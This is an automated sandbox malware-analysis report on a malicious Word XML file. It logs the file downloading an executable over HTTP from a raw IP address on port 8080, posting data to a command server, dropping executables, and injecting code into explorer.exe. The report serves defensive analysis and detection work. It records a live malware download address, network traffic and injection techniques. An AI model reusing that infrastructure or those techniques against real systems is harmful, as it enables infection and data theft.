
Analysis Report

Overview

General Information

Analysis ID: 58433
Start time: 14:53:40
Start date: 04/03/2015
Overall analysis duration: 0h 6m 11s
Report type: full
Sample file name: word.xml
Cookbook file name: default.jbs
Analysis system description: XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
HCA enabled: true
HCA success:
  • true, ratio: 98%
  • Number of executed functions: 46
  • Number of non-executed functions: 7
Warnings:
  • Report size getting too big, too many NtMapViewOfSection calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationProcess calls found.


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\edg1.exe, Code function: 3_2_00405DBC CryptAcquireContextW,3_2_00405DBC
Source: C:\edg1.exe, Code function: 3_1_004055D0 LoadLibraryW,SetupComm,DebugBreakProcess,LockResource,SetThreadAffinityMask,SetTapePosition,#180,AllocConsole,WritePrivateProfileStructA,DeleteFileA,GetPrivateProfileSectionNamesW,lstrlenA,GetStringTypeExA,SetEnvironmentVariableW,FindNextFileA,FreeLibraryAndExitThread,DecodeSystemPointer,EnumCalendarInfoExW,LoadCursorW,GetSystemWindowsDirectoryW,ResetEvent,GetStartupInfoW,IsBadWritePtr,#86,ReadConsoleW,GetCalendarInfoA,ReadConsoleA,#259,GetQueuedCompletionStatus,RegisterWindowMessageW,SHInvokePrinterCommandW,TerminateThread,FindAtomA,ReleaseActCtx,RemoveVectoredExceptionHandler,GetConsoleCP,CreateDirectoryW,SetCommBreak,FindFirstVolumeA,GetCommandLineA,WideCharToMultiByte,SetEnvironmentVariableA,VerifyVersionInfoA,ExitProcess,CreateDIBPatternBrushPt,InSendMessageEx,SetFileShortNameA,GetVolumeInformationW,CopyFileW,GlobalHandle,VirtualProtectEx,GetConsoleFontSize,CreateMDIWindowW,lstrcpyA,VirtualFree,FindAtomW,GetGeoInfoW,WriteConsoleOutputCharacterW,GetBinaryTypeW,WritePrivateProfileStringA,Create3_1_004055D0

Networking:

URLs found in memory or binary data
Source: explorer.exeString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exeString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.excite.co.jp/
Source: explorer.exeString found in binary or memory: http://www.expedia.com/
Source: explorer.exeString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.facebook.com/
Source: explorer.exeString found in binary or memory: http://www.facebook.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exeString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.google.ch
Source: explorer.exeString found in binary or memory: http://www.google.ch/
Source: explorer.exeString found in binary or memory: http://www.google.co.in/
Source: explorer.exeString found in binary or memory: http://www.google.co.jp/
Source: explorer.exeString found in binary or memory: http://www.google.co.uk/
Source: explorer.exeString found in binary or memory: http://www.google.com.br/
Source: explorer.exeString found in binary or memory: http://www.google.com.sa/
Source: explorer.exeString found in binary or memory: http://www.google.com.tw/
Source: explorer.exeString found in binary or memory: http://www.google.com/
Source: explorer.exeString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.google.cz/
Source: explorer.exeString found in binary or memory: http://www.google.de/
Source: explorer.exeString found in binary or memory: http://www.google.es/
Source: explorer.exeString found in binary or memory: http://www.google.fr/
Source: explorer.exeString found in binary or memory: http://www.google.it/
Source: explorer.exeString found in binary or memory: http://www.google.pl/
Source: explorer.exeString found in binary or memory: http://www.google.ru/
Source: explorer.exeString found in binary or memory: http://www.google.si/
Source: explorer.exeString found in binary or memory: http://www.iask.com/
Source: explorer.exeString found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exeString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.live.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exeString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exeString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exeString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: WINWORD.EXEString found in binary or memory: http://www.microsoft.com
Source: explorer.exeString found in binary or memory: http://www.microsoft.com.
Source: WINWORD.EXEString found in binary or memory: http://www.microsoft.com.windows
Source: explorer.exeString found in binary or memory: http://www.microsoft.com/favicon.ico
Source: WINWORD.EXEString found in binary or memory: http://www.microsoft.com/isapi/redir.dll?prd=&sbp=&plcid=&pver=&os=&over=&olcid=&clcid=&ar=&sba=&o1=
Source: WINWORD.EXEString found in binary or memory: http://www.microsoft.com/netmeeting/.
Source: explorer.exeString found in binary or memory: http://www.microsoft.com/schemas/rss/core/2005/internal
Source: explorer.exeString found in binary or memory: http://www.microsoft.com/windowsxp/expertzone/
Source: explorer.exeString found in binary or memory: http://www.mtv.com/
Source: explorer.exeString found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.najdi.si/
Source: explorer.exeString found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.neckermann.de/
Source: explorer.exeString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: WINWORD.EXEString found in binary or memory: http://www.officenet.net/
Source: explorer.exeString found in binary or memory: http://www.orange.fr/
Source: explorer.exeString found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.ozon.ru/
Source: explorer.exeString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exeString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.priceminister.com/
Source: explorer.exeString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.rambler.ru/
Source: explorer.exeString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exeString found in binary or memory: http://www.rtl.de/
Source: explorer.exeString found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exeString found in binary or memory: http://www.shopzilla.com/
Source: explorer.exeString found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.sogou.com/
Source: explorer.exeString found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.soso.com/
Source: explorer.exeString found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.taobao.com/
Source: explorer.exeString found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.target.com/
Source: explorer.exeString found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.tchibo.de/
Source: explorer.exeString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.tesco.com/
Source: explorer.exeString found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.univision.com/
Source: explorer.exeString found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.w3.org/1999/02/22-rdf-syntax-ns#
Source: explorer.exeString found in binary or memory: http://www.w3.org/1999/xhtml
Source: explorer.exeString found in binary or memory: http://www.w3.org/1999/xsl/transform
Source: WINWORD.EXEString found in binary or memory: http://www.w3.org/2001/schema-instance
Source: explorer.exeString found in binary or memory: http://www.w3.org/tr/html4/loose.dtd
Source: explorer.exeString found in binary or memory: http://www.w3.org/tr/html4/strict.dtd
Source: explorer.exeString found in binary or memory: http://www.w3.org/tr/html401/strict.dtd
Source: explorer.exeString found in binary or memory: http://www.w3.org/tr/rec-html40/strict.dtd
Source: WINWORD.EXE, explorer.exeString found in binary or memory: http://www.w3.org/tr/wd-xsl
Source: explorer.exeString found in binary or memory: http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd
Source: WINWORD.EXEString found in binary or memory: http://www.w3.org/xml/1998/namespace
Source: explorer.exeString found in binary or memory: http://www.walmart.com/
Source: explorer.exeString found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.weather.com/
Source: explorer.exeString found in binary or memory: http://www.weather.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://www.yandex.ru/
Source: explorer.exeString found in binary or memory: http://www.yandex.ru/favicon.ico
Source: explorer.exeString found in binary or memory: http://www3.fnac.com/
Source: explorer.exeString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?service=awsecommerceservice&version=2008-06-26&operation
Source: explorer.exeString found in binary or memory: http://yellowpages.superpages.com/
Source: explorer.exeString found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: explorer.exeString found in binary or memory: http://z.about.com/m/a08.ico
Source: rundll32.exe, explorer.exeString found in binary or memory: https://
Source: explorer.exeString found in binary or memory: https://check.torproject.org/?lang=de
Source: MSOXMLED.EXE, WINWORD.EXE, explorer.exeString found in binary or memory: https://check.torproject.org/favicon.ico
Source: explorer.exeString found in binary or memory: https://example.com
Source: explorer.exeString found in binary or memory: https://ieonlinews.microsoft.com/
Source: explorer.exeString found in binary or memory: https://localhost
Source: explorer.exeString found in binary or memory: https://www.example.com.
Source: explorer.exeString found in binary or memory: https://www.google.ch
Source: explorer.exeString found in binary or memory: https://www.google.ch/
Source: MSOXMLED.EXE, WINWORD.EXE, explorer.exeString found in binary or memory: https://www.google.ch/favicon.ico
Contains functionality to download additional files from the internet
Source: C:\edg1.exe | Code function: 3_2_004077AA select,recv,recv
Downloads files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\abs5ajsu[1].exe
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OK Server: Microsoft-IIS/8.5 Date: Wed, 04 Mar 2015 13:54:06 GMT Content-Type: application/x-msdos-program Content-Length: 84992 Connection: keep-alive Last-Modified: Wed, 04 Mar 2015 09:03:08 GMT ETag: "1000ba0-14c00-51072b85b2eff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 66 de 3f b2 07 b0 6c b2 07 b0 6c b2 07 b0 6c 95 c1 cb 6c b0 07 b0 6c 71 08 ed 6c a5 07 b0 6c b2 07 b1 6c e7 07 b0 6c b2 07 b0 6c b3 07 b0 6c 95 c1 c8 6c b3 07 b0 6c 52 69 63 68 b2 07 b0 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 Data Ascii: MZ@!
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /azvxjdfr31k/abs5ajsu.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: 178.32.184.11:8080 Connection: Keep-Alive
Found strings which match to known social media urls
Posts data to webserver
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Referer: https://twitter.com/ Content-Type: video/h264 Host: 3dtZB co User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 Connection: Close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Length: 6980
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /azvxjdfr31k/abs5ajsu.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: 178.32.184.11:8080 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Referer: https://twitter.com/ Content-Type: video/h264 Host: 3dtZB co User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 Connection: Close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Length: 6980
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.10:1031 -> 178.32.184.11:8080

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\abs5ajsu[1].exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fdgfdgdfga.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\edg1.exe | Code function: 3_2_00405D58 RtlMoveMemory,LoadLibraryW,GetProcAddress
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe | Code execution: Found new code
Source: C:\edg1.exe | Code execution: Found new code
Source: C:\WINDOWS\system32\rundll32.exe | Code execution: Found new code
Source: C:\WINDOWS\system32\rundll32.exe | Code execution: Found new code

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0

System Summary:

Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems
Binary contains paths to debug symbols
Source: Binary string: wwintl.pdb source: WINWORD.EXE
Source: Binary string: buildlab1\otools\BBT_TEMP\FNAMEO.pdb source: WINWORD.EXE
Source: Binary string: vsplab1\otools\BBT_TEMP\MSOINTLO.pdb source: WINWORD.EXE
Source: Binary string: evsplab1\otools\BBT_TEMP\WWINTLO.pdb source: WINWORD.EXE
Source: Binary string: stintl.pdb source: WINWORD.EXE
Source: Binary string: msointl.pdb source: WINWORD.EXE
Source: Binary string: mscoree32.pdb source: rundll32.exe
Source: Binary string: fice\11.0\5510.0\setup\X86\ship\Files\PFiles\Common\MSShared\smarttag\1033\stintl.pdb source: WINWORD.EXE
Source: Binary string: fname.pdb source: WINWORD.EXE
Contains functionality to load and extract PE file embedded resources
Source: C:\edg1.exeCode function: 3_1_004055D0 LoadLibraryW,SetupComm,DebugBreakProcess,LockResource,SetThreadAffinityMask,SetTapePosition,#180,AllocConsole,WritePrivateProfileStructA,DeleteFileA,GetPrivateProfileSectionNamesW,lstrlenA,GetStringTypeExA,SetEnvironmentVariableW,FindNextFileA,FreeLibraryAndExitThread,DecodeSystemPointer,EnumCalendarInfoExW,LoadCursorW,GetSystemWindowsDirectoryW,ResetEvent,GetStartupInfoW,IsBadWritePtr,#86,ReadConsoleW,GetCalendarInfoA,ReadConsoleA,#259,GetQueuedCompletionStatus,RegisterWindowMessageW,SHInvokePrinterCommandW,TerminateThread,FindAtomA,ReleaseActCtx,RemoveVectoredExceptionHandler,GetConsoleCP,CreateDirectoryW,SetCommBreak,FindFirstVolumeA,GetCommandLineA,WideCharToMultiByte,SetEnvironmentVariableA,VerifyVersionInfoA,ExitProcess,CreateDIBPatternBrushPt,InSendMessageEx,SetFileShortNameA,GetVolumeInformationW,CopyFileW,GlobalHandle,VirtualProtectEx,GetConsoleFontSize,CreateMDIWindowW,lstrcpyA,VirtualFree,FindAtomW,GetGeoInfoW,WriteConsoleOutputCharacterW,GetBinaryTypeW,WritePrivateProfileStringA,Create3_1_004055D0
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\word.xml.LNK
Creates temporary files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFF099.tmp
Reads ini files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File read: C:\Documents and Settings\Administrator\Application Data\desktop.ini
Runs a DLL by calling functions
Source: C:\edg1.exe | Process created: C:\WINDOWS\system32\rundll32.exe rundll32.exe C:\2.tmp NotifierInit
Spawns processes
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXE
Source: unknown | Process created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Source: unknown | Process created: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe
Source: unknown | Process created: C:\edg1.exe
Source: unknown | Process created: C:\WINDOWS\system32\rundll32.exe
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXE | Process created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde C:\word.xml
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process created: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe | Process created: C:\edg1.exe \edg1.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FDGFDG~1.EXE
Source: C:\edg1.exe | Process created: C:\WINDOWS\system32\rundll32.exe rundll32.exe C:\2.tmp NotifierInit
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DAD90BC7-5321-4048-939A-694B0A274C02}\InprocServer32
Creates mutexes
Source: C:\WINDOWS\system32\rundll32.exe | Mutant created: \BaseNamedObjects\Global\06d5c3d3b70a1d31f17814cc66d006bf
Enables driver privileges
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process token adjusted: Load Driver
Tries to load missing DLLs
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Section loaded: xpsp2res.dll

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: WINWORD.EXE, rundll32.exe, explorer.exe | Binary or memory string: Progman
Source: WINWORD.EXE, rundll32.exe, explorer.exe | Binary or memory string: Program Manager
Source: WINWORD.EXE, explorer.exe | Binary or memory string: Shell_TrayWnd
Allocates memory in foreign processes
Source: C:\WINDOWS\system32\rundll32.exe | Memory allocated: C:\WINDOWS\explorer.exe base: 2640000 protect: page read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory allocated: C:\WINDOWS\explorer.exe base: CB0000 protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory allocated: C:\WINDOWS\explorer.exe base: F40000 protect: page read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory allocated: C:\WINDOWS\explorer.exe base: F73000 protect: page read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: 2640000 protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: 2640000 protect: page read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: CB0000 protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: CB0000 protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: CB09AC protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: CB0000 protect: page execute and read and write
Source: C:\WINDOWS\system32\rundll32.exe | Memory protected: C:\WINDOWS\explorer.exe base: F73000 protect: page read and write and page guard
Contains functionality to inject code into remote processes
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Creates a thread in another existing process (thread injection)
Source: C:\WINDOWS\system32\rundll32.exe | Thread created: C:\WINDOWS\explorer.exe EIP: 7C8106F9
Injects a PE file into foreign processes
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: C:\WINDOWS\explorer.exe base: 2640000 value starts with: 4D5A
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: C:\WINDOWS\explorer.exe base: CB0000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: PID: 1564 base: 2640000 value: 4D
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: PID: 1564 base: CB0000 value: 4D
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: PID: 1564 base: CB09AC value: 55
Writes to foreign memory regions
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: C:\WINDOWS\explorer.exe base: 2640000
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: C:\WINDOWS\explorer.exe base: CB0000
Source: C:\WINDOWS\system32\rundll32.exe | Memory written: C:\WINDOWS\explorer.exe base: CB09AC

Anti Debugging and Sandbox Evasion:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\edg1.exe | System information queried: KernelDebuggerInformation
Checks the free space of harddrives
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File Volume queried: C:\WINDOWS\system32 FullSizeInformation
Source: C:\WINDOWS\explorer.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to dynamically determine API calls
Source: C:\edg1.exe | Code function: 3_2_00405D58 RtlMoveMemory,LoadLibraryW,GetProcAddress
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\edg1.exe | Code function: 3_2_00405E44 GetProcessHeap,HeapAlloc
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXE | Memory protected: page read and write and page guard
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Dropped PE file which has not been started: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\abs5ajsu[1].exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Dropped PE file which has not been started: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fdgfdgdfga.exe
Is looking for software installed on the system
Source: C:\edg1.exe | Registry key enumerated: More than 225 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 288 | Thread sleep count: 557 > 100
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 288 | Thread sleep time: -111400ms >= -60000ms
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1116 | Thread sleep time: -60000ms >= -60000ms
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1836 | Thread sleep time: -922337203685477ms >= -60000ms

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directory
Source: C:\WINDOWS\system32\rundll32.exe | Code function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Queries a list of all running processes
Source: C:\WINDOWS\system32\rundll32.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
